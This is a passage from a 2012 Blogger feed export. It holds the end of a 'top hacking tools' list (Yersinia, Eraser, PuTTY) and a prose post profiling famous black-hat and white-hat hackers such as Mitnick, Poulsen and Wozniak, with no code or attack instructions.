&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;http://www.yersinia.net/&quot; target=&quot;_blank&quot;&gt;Get Yersinia here&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;strong style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;9. Eraser&lt;/strong&gt;&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgy5GN6dYBkaXxIkEDuMExXAai3lIeTorDfYeSeG4bH6nMjKr2EepU8_rbCXvD-8-U_IeiPnYmmgfQvSxEuLpYiB-KELNT4gV6pUkyjRPQ12YemjGcp-HhKKeI8A1tLNirV-GXV1rg7xlo/s1600/eraser.jpg&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;129&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgy5GN6dYBkaXxIkEDuMExXAai3lIeTorDfYeSeG4bH6nMjKr2EepU8_rbCXvD-8-U_IeiPnYmmgfQvSxEuLpYiB-KELNT4gV6pUkyjRPQ12YemjGcp-HhKKeI8A1tLNirV-GXV1rg7xlo/s320/eraser.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;Eraser is an advanced security tool (for&amp;nbsp;&lt;em style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;Windows&lt;/em&gt;),
 which allows you to completely remove sensitive data from your hard 
drive by overwriting it several times with carefully selected patterns. 
Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free 
software and its source code is released under GNU General Public 
License.&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
An
 excellent tool for keeping your data really safe, if you’ve deleted 
it..make sure it’s really gone, you don’t want it hanging around to bite
 you in the ass.&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;http://www.heidi.ie/eraser/download.php&quot; target=&quot;_blank&quot;&gt;Get Eraser here&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF_aJmA6-PNOnF4sC5oH1nC6BjIW1VMtmdNtebGSMyJ1qyu8dojW0UWjXqwF2O5caf1ZwJb4vfi543plSzZyyXx-VyjQWJe57IvapPzUKfwFis6TfQw23FVAKgbErm_kaqAxNBUdVg-Vg/s1600/images.jpg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;160&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF_aJmA6-PNOnF4sC5oH1nC6BjIW1VMtmdNtebGSMyJ1qyu8dojW0UWjXqwF2O5caf1ZwJb4vfi543plSzZyyXx-VyjQWJe57IvapPzUKfwFis6TfQw23FVAKgbErm_kaqAxNBUdVg-Vg/s200/images.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;strong style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;10. PuTTY&lt;/strong&gt;&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
PuTTY
 is a free implementation of Telnet and SSH for Win32 and Unix 
platforms, along with an xterm terminal emulator. A must have for any 
h4x0r wanting to telnet or SSH from Windows without having to use the 
crappy default MS command line clients.&lt;/div&gt;
&lt;div style=&quot;background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #3f312e; margin-bottom: 18px; margin-top: 18px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;http://www.chiark.greenend.org.uk/%7Esgtatham/putty/&quot; target=&quot;_blank&quot;&gt;Get Putty here&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/5383231781114296308/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/04/top-10-securityhacking-tools-utilities.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/5383231781114296308'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/5383231781114296308'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/04/top-10-securityhacking-tools-utilities.html' title='Top 10 Security/Hacking Tools &amp; Utilities'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu6pdijH-D4s4f2syUxDpXRbE2kcBGC1gCLYah4gd6CfZI7qD53j6qHYI8fD79MR4iN27i31RYFMX0Ls1H7su5WEF6ND6OuAFz9yMfqm2mqyVMwvndMagi6pOzFWAP3e1doKdQchO849w/s72-c/Nmap_Tutorial_2012.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-1293829207543141565</id><published>2012-04-20T10:21:00.000-07:00</published><updated>2013-09-06T07:09:54.953-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><title type='text'>Top 10 Most Famous Hackers of All Time</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The portrayal of hackers in the media has ranged from the high-tech super-spy, as in &lt;a href=&quot;http://www.imdb.com/title/tt0117060/plotsummary&quot; rel=&quot;nofollow&quot;&gt;Mission Impossible&lt;/a&gt;
 where Ethan Hunt repels from the ceiling to hack the CIA computer 
system and steal the &quot;NOC list,&quot; to the lonely anti-social teen who is 
simply looking for entertainment.&lt;br /&gt;

The reality, however, is that hackers are a very diverse bunch, a 
group simultaneously blamed with causing billions of dollars in damages 
as well as credited with the development of the World Wide Web and the 
founding of major tech companies. In this article, we test the theory 
that truth is better than fiction by introducing you to ten of the most 
famous hackers, both nefarious and heroic, to let you decide for 
yourself.&lt;br /&gt;

&lt;strong&gt;Black Hat Crackers&lt;/strong&gt;&lt;br /&gt;

The Internet abounds with hackers, known as crackers or &quot;&lt;a href=&quot;http://www.itsecurity.com/features/black-hat-roundup-080207/&quot; target=&quot;_blank&quot;&gt;black hats&lt;/a&gt;,&quot;
 who work to exploit computer systems. They are the ones you&#39;ve seen on 
the news being hauled away for cybercrimes. Some of them do it for fun 
and curiosity, while others are looking for personal gain. In this 
section we profile five of the most famous and interesting &quot;black hat&quot; 
hackers.&lt;br /&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Jonathan James&lt;/strong&gt;: James gained notoriety when he 
became the first juvenile to be sent to prison for hacking. He was 
sentenced at 16 years old. In an &lt;a href=&quot;http://www.pbs.org/wgbh/pages/frontline/shows/hackers/interviews/anon.html&quot; rel=&quot;nofollow&quot;&gt;anonymous PBS interview&lt;/a&gt;, he professes, &quot;I was just looking around, playing around. What was fun for me was a challenge to see what I could pull off.&quot;&lt;br /&gt;

James&#39;s major intrusions targeted high-profile organizations. He 
installed a backdoor into a Defense Threat Reduction Agency server. The &lt;a href=&quot;http://www.usdoj.gov/opa/pr/2000/September/555crm.htm&quot; rel=&quot;nofollow&quot;&gt;DTRA&lt;/a&gt;
 is an agency of the Department of Defense charged with reducing the 
threat to the U.S. and its allies from nuclear, biological, chemical, 
conventional and special weapons. The backdoor he created enabled him to
 view sensitive emails and capture employee usernames and passwords.&lt;br /&gt;

James also cracked into NASA computers, stealing software worth 
approximately $1.7 million. According to the Department of Justice, &quot;The
 software supported the International Space Station&#39;s physical 
environment, including control of the temperature and humidity within 
the living space.&quot; NASA was forced to shut down its computer systems, 
ultimately racking up a $41,000 cost. James explained that he downloaded
 the code to supplement his studies on C programming, but contended, 
&quot;The code itself was crappy . . . certainly not worth $1.7 million like 
they claimed.&quot;&lt;br /&gt;

Given the extent of his intrusions, if &lt;a href=&quot;http://en.wikipedia.org/wiki/Jonathan_James_%28convicted_cybercriminal%29&quot; rel=&quot;nofollow&quot;&gt;James,&lt;/a&gt;
 also known as &quot;c0mrade,&quot; had been an adult he likely would have served 
at least 10 years. Instead, he was banned from recreational computer use
 and was slated to serve a six-month sentence under house arrest with 
probation. However, he served six months in prison for violation of 
parole. Today, James asserts that he&#39;s learned his lesson and might 
start a computer security company.&lt;br /&gt;

&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Adrian Lamo&lt;/strong&gt;: Lamo&#39;s claim to fame is his break-ins 
at major organizations like The New York Times and Microsoft. Dubbed the
 &quot;homeless hacker,&quot; he used Internet connections at Kinko&#39;s, coffee 
shops and libraries to do his intrusions. In a profile article, &quot;&lt;a href=&quot;http://www.wired.com/news/culture/0,50811-1.html?tw=wn_story_page_next1&quot; rel=&quot;nofollow&quot;&gt;He Hacks by Day, Squats by Night&lt;/a&gt;,&quot;
 Lamo reflects, &quot;I have a laptop in Pittsburgh, a change of clothes in 
D.C. It kind of redefines the term multi-jurisdictional.&quot;&lt;br /&gt;

Lamo&#39;s intrusions consisted mainly of penetration testing, in which 
he found flaws in security, exploited them and then informed companies 
of their shortcomings. His hits include Yahoo!, Bank of America, 
Citigroup and Cingular. When white hat hackers are hired by companies to
 do penetration testing, it&#39;s legal. What Lamo did is not.&lt;br /&gt;

When he broke into The New York Times&#39; intranet, things got serious. 
He added himself to a list of experts and viewed personal information on
 contributors, including Social Security numbers. Lamo also hacked into 
The Times&#39; LexisNexis account to research high-profile subject matter.&lt;br /&gt;

For his intrusion at The New York Times, Lamo was ordered to pay 
approximately $65,000 in restitution. He was also sentenced to six 
months of home confinement and two years of probation, which expired 
January 16, 2007. Lamo is currently working as an award-winning 
journalist and public speaker.&lt;br /&gt;

&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Kevin Mitnick&lt;/strong&gt;: A self-proclaimed &quot;hacker poster boy,&quot; &lt;a href=&quot;http://en.wikipedia.org/wiki/Kevin_Mitnick&quot; rel=&quot;nofollow&quot;&gt;Mitnick&lt;/a&gt;
 went through a highly publicized pursuit by authorities. His mischief 
was hyped by the media but his actual offenses may be less notable than 
his notoriety suggests. &lt;a href=&quot;http://www.usdoj.gov/criminal/cybercrime/mitnick.htm&quot; rel=&quot;nofollow&quot;&gt;The Department of Justice&lt;/a&gt;
 describes him as &quot;the most wanted computer criminal in United States 
history.&quot; His exploits were detailed in two movies: Freedom Downtime and
 Takedown.&lt;br /&gt;

Mitnick had a bit of hacking experience before committing the 
offenses that made him famous. He started out exploiting the Los Angeles
 bus punch card system to get free rides. Then, like Apple co-founder 
Steve Wozniak, dabbled in phone phreaking. Although there were numerous 
offenses, Mitnick was ultimately convicted for breaking into the Digital
 Equipment Corporation&#39;s computer network and stealing software.&lt;br /&gt;

Mitnick&#39;s mischief got serious when he went on a two and a half year &quot;coast-to-coast hacking spree.&quot; The CNN article, &quot;&lt;a href=&quot;http://www.usdoj.gov/criminal/cybercrime/mitnick.htm&quot; rel=&quot;nofollow&quot;&gt;Legendary computer hacker released from prison&lt;/a&gt;,&quot;
 explains that &quot;he hacked into computers, stole corporate secrets, 
scrambled phone networks and broke into the national defense warning 
system.&quot; He then hacked into computer expert and fellow hacker Tsutomu 
Shimomura&#39;s home computer, which led to his undoing.&lt;br /&gt;

Today, Mitnick has been able to move past his role as a black hat 
hacker and become a productive member of society. He served five years, 
about 8 months of it in solitary confinement, and is now a computer 
security consultant, author and speaker.&lt;br /&gt;

&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Kevin Poulsen&lt;/strong&gt;: Also known as Dark Dante, &lt;a href=&quot;http://www.nndb.com/people/453/000022387/&quot; rel=&quot;nofollow&quot;&gt;Poulsen&lt;/a&gt;
 gained recognition for his hack of LA radio&#39;s KIIS-FM phone lines, 
which earned him a brand new Porsche, among other items. Law enforcement
 dubbed him &quot;the Hannibal Lecter of computer crime.&quot;&lt;br /&gt;

Authorities began to pursue Poulsen after he hacked into a federal 
investigation database. During this pursuit, he further drew the ire of 
the FBI by hacking into federal computers for wiretap information.&lt;br /&gt;

His hacking specialty, however, revolved around &lt;a href=&quot;http://www.voip-news.com/nbx3com.htm&quot; target=&quot;_blank&quot;&gt;telephones&lt;/a&gt;. Poulsen&#39;s most famous hack, KIIS-FM, was accomplished by taking over all of the station&#39;s phone lines. In a related &lt;a href=&quot;http://en.wikipedia.org/wiki/Kevin_Poulsen&quot; rel=&quot;nofollow&quot;&gt;feat&lt;/a&gt;,
 Poulsen also &quot;reactivated old Yellow Page escort telephone numbers for 
an acquaintance who then ran a virtual escort agency.&quot; Later, when his 
photo came up on the show Unsolved Mysteries, 1-800 phone lines for the 
program crashed. Ultimately, Poulsen was captured in a supermarket and 
served a sentence of five years.&lt;br /&gt;

Since serving time, Poulsen has worked as a journalist. He is now a 
senior editor for Wired News. His most prominent article details his 
work on identifying 744 sex offenders with MySpace profiles.&lt;br /&gt;

&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Robert Tappan Morris&lt;/strong&gt;: Morris, son of former National Security Agency scientist Robert Morris, is known as the creator of the &lt;a href=&quot;http://en.wikipedia.org/wiki/Morris_worm&quot; rel=&quot;nofollow&quot;&gt;Morris Worm,&lt;/a&gt;
 the first computer worm to be unleashed on the Internet. As a result of
 this crime, he was the first person prosecuted under the 1986 Computer 
Fraud and Abuse Act.&lt;br /&gt;

Morris wrote the code for the worm while he was a student at Cornell.
 He asserts that he intended to use it to see how large the Internet 
was. The worm, however, replicated itself excessively, slowing computers
 down so that they were no longer usable. It is not possible to know 
exactly how many computers were affected, but experts estimate an impact
 of 6,000 machines. He was sentenced to three years&#39; probation, 400 
hours of community service and a fined $10,500.&lt;br /&gt;

&lt;a href=&quot;http://en.wikipedia.org/wiki/Robert_Tappan_Morris&quot; rel=&quot;nofollow&quot;&gt;Morris&lt;/a&gt;
 is currently working as a tenured professor at the MIT Computer Science
 and Artificial Intelligence Laboratory. He principally researches 
computer network architectures including distributed hash tables such as
 Chord and wireless mesh networks such as Roofnet.&lt;br /&gt;

&lt;/li&gt;
&lt;/ol&gt;
&lt;strong&gt;White Hat Hackers&lt;/strong&gt;&lt;br /&gt;

Hackers that use their skills for good are classified as &quot;&lt;a href=&quot;http://www.networksecurityjournal.com/features/black-hats-become-white-hats-091107/&quot; target=&quot;_blank&quot;&gt;white hat&lt;/a&gt;.&quot;
 These white hats often work as certified &quot;Ethical Hackers,&quot; hired by 
companies to test the integrity of their systems. Others, operate 
without company permission by bending but not breaking laws and in the 
process have created some really cool stuff. In this section we profile 
five white hat hackers and the technologies they have developed.&lt;br /&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Stephen Wozniak&lt;/strong&gt;: &quot;Woz&quot; is famous for being the 
&quot;other Steve&quot; of Apple. Wozniak, along with current Apple CEO Steve 
Jobs, co-founded Apple Computer. He has been awarded with the National 
Medal of Technology as well as honorary doctorates from Kettering 
University and Nova Southeastern University. Additionally, Woz was 
inducted into the National Inventors Hall of Fame in September 2000.&lt;br /&gt;

Woz got his start in hacking making blue boxes, devices that bypass 
telephone-switching mechanisms to make free long-distance calls. After 
reading an article about phone phreaking in Esquire, Wozniak called up 
his buddy Jobs. The pair did research on frequencies, then built and 
sold blue boxes to their classmates in college. Wozniak even used a blue
 box to call the Pope while pretending to be Henry Kissinger.&lt;br /&gt;

&lt;a href=&quot;http://en.wikipedia.org/wiki/Steve_Wozniak&quot; rel=&quot;nofollow&quot;&gt;Wozniak&lt;/a&gt;
 dropped out of college and came up with the computer that eventually 
made him famous. Jobs had the bright idea to sell the computer as a 
fully assembled PC board. The Steves sold Wozniak&#39;s cherished scientific
 calculator and Jobs&#39; VW van for capital and got to work assembling 
prototypes in Jobs&#39; garage. Wozniak designed the hardware and most of 
the software. In the &lt;a href=&quot;http://www.woz.org/letters/general/index.html&quot; rel=&quot;nofollow&quot;&gt;Letters&lt;/a&gt;
 section of Woz.org, he recalls doing &quot;what Ed Roberts and Bill Gates 
and Paul Allen did and tons more, with no help.&quot; Wozniak and Jobs sold 
the first 100 of the Apple I to a local dealer for $666.66 each.&lt;br /&gt;

Woz no longer works full time for Apple, focusing primarily on 
philanthropy instead. Most notable is his function as fairy godfather to
 the Los Gatos, Calif. School District. &quot;Wozniak &#39;&lt;a href=&quot;http://www.woz.org:16080/wozscape/wozbio.html&quot; rel=&quot;nofollow&quot;&gt;adopted&lt;/a&gt;&#39;
 the Los Gatos School District, providing students and teachers with 
hands-on teaching and donations of state-of-the-art technology 
equipment.&quot;&lt;br /&gt;

&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tim Berners-Lee&lt;/strong&gt;: Berners-Lee is famed as the 
inventor of the World Wide Web, the system that we use to access sites, 
documents and files on the Internet. He has received numerous 
recognitions, most notably the Millennium Technology Prize.&lt;br /&gt;

While a student at Oxford University, Berners-Lee was caught hacking 
access with a friend and subsequently banned from University computers. &lt;a href=&quot;http://www.w3.org/People/Berners-Lee/Longer.html&quot; rel=&quot;nofollow&quot;&gt;w3.org&lt;/a&gt;
 reports, &quot;Whilst [at Oxford], he built his first computer with a 
soldering iron, TTL gates, an M6800 processor and an old television.&quot; 
Technological innovation seems to have run in his genes, as 
Berners-Lee&#39;s parents were mathematicians who worked on the Manchester 
Mark1, one of the earliest electronic computers.&lt;br /&gt;

While working with CERN, a European nuclear research organization, 
Berners-Lee created a hypertext prototype system that helped researchers
 share and update information easily. He later realized that hypertext 
could be joined with the Internet. Berners-Lee &lt;a href=&quot;http://www.w3.org/People/Berners-Lee/Kids#What&quot; rel=&quot;nofollow&quot;&gt;recounts&lt;/a&gt;
 how he put them together: &quot;I just had to take the hypertext idea and 
connect it to the TCP and DNS ideas and – ta-da! – the World Wide Web.&quot;&lt;br /&gt;

Since his creation of the World Wide Web, Berners-Lee founded the 
World Wide Web Consortium at MIT. The W3C describes itself as &quot;an 
international consortium where Member organizations, a full-time staff 
and the public work together to develop Web standards.&quot; Berners-Lee&#39;s 
World Wide Web idea, as well as standards from the W3C, is distributed 
freely with no patent or royalties due.&lt;br /&gt;

&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Linus Torvalds&lt;/strong&gt;: &lt;a href=&quot;http://www.wired.com/wired/archive/11.07/40torvalds.html&quot; rel=&quot;nofollow&quot;&gt;Torvalds&lt;/a&gt;
 fathered Linux, the very popular Unix-based operating system. He calls 
himself &quot;an engineer,&quot; and has said that his aspirations are simple, &quot;I 
just want to have fun making the best damn operating system I can.&quot;&lt;br /&gt;

Torvalds got his start in computers with a Commodore VIC-20, an 8-bit home computer. He then moved on to a Sinclair QL. &lt;a href=&quot;http://en.wikipedia.org/wiki/Linus_Torvalds&quot; rel=&quot;nofollow&quot;&gt; Wikipedia&lt;/a&gt;
 reports that he modified the Sinclair &quot;extensively, especially its 
operating system.&quot; Specifically, Torvalds hacks included &quot;an assembler 
and a text editor…as well as a few games.&quot;&lt;br /&gt;

Torvalds created the &lt;a href=&quot;http://en.wikipedia.org/wiki/Linux_kernel&quot; rel=&quot;nofollow&quot;&gt;Linux kernel&lt;/a&gt;
 in 1991, using the Minix operating system as inspiration. He started 
with a task switcher in Intel 80386 assembly and a terminal driver. 
After that, he put out a call for others to contribute code, which they 
did. Currently, only about 2 percent of the current Linux kernel is 
written by Torvalds himself. The success of this public invitation to 
contribute code for Linux is touted as one of the most prominent 
examples of free/open source software.&lt;br /&gt;

Currently, Torvalds serves as the Linux ringleader, coordinating the 
code that volunteer programmers contribute to the kernel. He has had an 
asteroid named after him and received honorary doctorates from Stockholm
 University and University of Helsinki. He was also featured in Time 
Magazine&#39;s &quot;&lt;a href=&quot;http://www.time.com/time/europe/hero2006/torvalds.html&quot; rel=&quot;nofollow&quot;&gt;60 Years of Heroes&lt;/a&gt;.&quot;&lt;br /&gt;

&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Richard Stallman&lt;/strong&gt;: Stallman&#39;s fame derives from the 
GNU Project, which he founded to develop a free operating system. For 
this, he&#39;s known as the father of free software. His &quot;&lt;a href=&quot;http://www.stallman.org/#serious&quot; rel=&quot;nofollow&quot;&gt;Serious Bio&lt;/a&gt;&quot;
 asserts, &quot;Non-free software keeps users divided and helpless, forbidden
 to share it and unable to change it. A free operating system is 
essential for people to be able to use computers in freedom.&quot;&lt;br /&gt;

&lt;a href=&quot;http://en.wikipedia.org/wiki/Richard_stallman&quot; rel=&quot;nofollow&quot;&gt;Stallman,&lt;/a&gt;
 who prefers to be called rms, got his start hacking at MIT. He worked 
as a &quot;staff hacker&quot; on the Emacs project and others. He was a critic of 
restricted computer access in the lab. When a password system was 
installed, Stallman broke it down, resetting passwords to null strings, 
then sent users messages informing them of the removal of the password 
system.&lt;br /&gt;

Stallman&#39;s crusade for free software started with a printer. At the 
MIT lab, he and other hackers were allowed to modify code on printers so
 that they sent convenient alert messages. However, a new printer came 
along – one that they were not allowed to modify. It was located away 
from the lab and the absence of the alerts presented an inconvenience. 
It was at this point that he was &quot;convinced…of the ethical need to 
require free software.&quot;&lt;br /&gt;

With this inspiration, he began work on GNU. Stallman wrote an essay, &quot;&lt;a href=&quot;http://www.gnu.org/gnu/thegnuproject.html&quot; rel=&quot;nofollow&quot;&gt;The GNU Project&lt;/a&gt;,&quot;
 in which he recalls choosing to work on an operating system because 
it&#39;s a foundation, &quot;the crucial software to use a computer.&quot; At this 
time, the GNU/Linux version of the operating system uses the Linux 
kernel started by Torvalds. GNU is distributed under &quot;copyleft,&quot; a 
method that employs copyright law to allow users to use, modify, copy 
and distribute the software.&lt;br /&gt;

Stallman&#39;s life continues to revolve around the promotion of free 
software. He works against movements like Digital Rights Management (or 
as he prefers, Digital Restrictions Management) through organizations 
like Free Software Foundation and League for Programming Freedom. He has
 received extensive recognition for his work, including awards, 
fellowships and four honorary doctorates.&lt;br /&gt;

&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tsutomu Shimomura&lt;/strong&gt;: Shimomura reached fame in an 
unfortunate manner: he was hacked by Kevin Mitnick. Following this 
personal attack, he made it his cause to help the FBI capture him.&lt;br /&gt;

Shimomura&#39;s work to catch Mitnick is commendable, but he is not without his own dark side. Author Bruce Sterling &lt;a href=&quot;http://en.wikipedia.org/wiki/Tsutomu_Shimomura&quot; rel=&quot;nofollow&quot;&gt;recalls:&lt;/a&gt;
 &quot;He pulls out this AT&amp;amp;T cellphone, pulls it out of the shrinkwrap, 
finger-hacks it, and starts monitoring phone calls going up and down 
Capitol Hill while an FBI agent is standing at his shoulder, listening 
to him.&quot;&lt;br /&gt;

Shimomura out-hacked Mitnick to bring him down. Shortly after finding
 out about the intrusion, he rallied a team and got to work finding 
Mitnick. Using Mitnick&#39;s cell phone, they tracked him near 
Raleigh-Durham International Airport. The article, &quot;&lt;a href=&quot;http://www.takedown.com/coverage/sdsc-experts.html&quot; rel=&quot;nofollow&quot;&gt;SDSC Computer Experts Help FBI Capture Computer Terrorist&lt;/a&gt;&quot;
 recounts how Shimomura pinpointed Mitnick&#39;s location. Armed with a 
technician from the phone company, Shimomura &quot;used a cellular frequency 
direction-finding antenna hooked up to a laptop to narrow the search to 
an apartment complex.&quot; Mitnick was arrested shortly thereafter. 
Following the pursuit, Shimomura wrote a book about the incident with 
journalist John Markoff, which was later turned into a movie.&lt;br /&gt;

&lt;/li&gt;
&lt;/ol&gt;
We hope you have enjoyed our introduction to some of the most famous 
real-life hackers, both white and black alike, and have gotten a clearer
 impression of who hackers really are. To find out more about hacking, 
cracking, these or other famous hackers, or just how to keep your 
computer safe from all of the above, check out the following resources:&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/1293829207543141565/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/04/top-10-most-famous-hackers-of-all-time.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/1293829207543141565'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/1293829207543141565'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/04/top-10-most-famous-hackers-of-all-time.html' title='Top 10 Most Famous Hackers of All Time'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-6656898536822748442</id><published>2012-04-20T08:17:00.000-07:00</published><updated>2012-04-20T08:17:07.439-07:00</updated><title type='text'>Setting Webserver- Host Webpages on your own computer</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Have
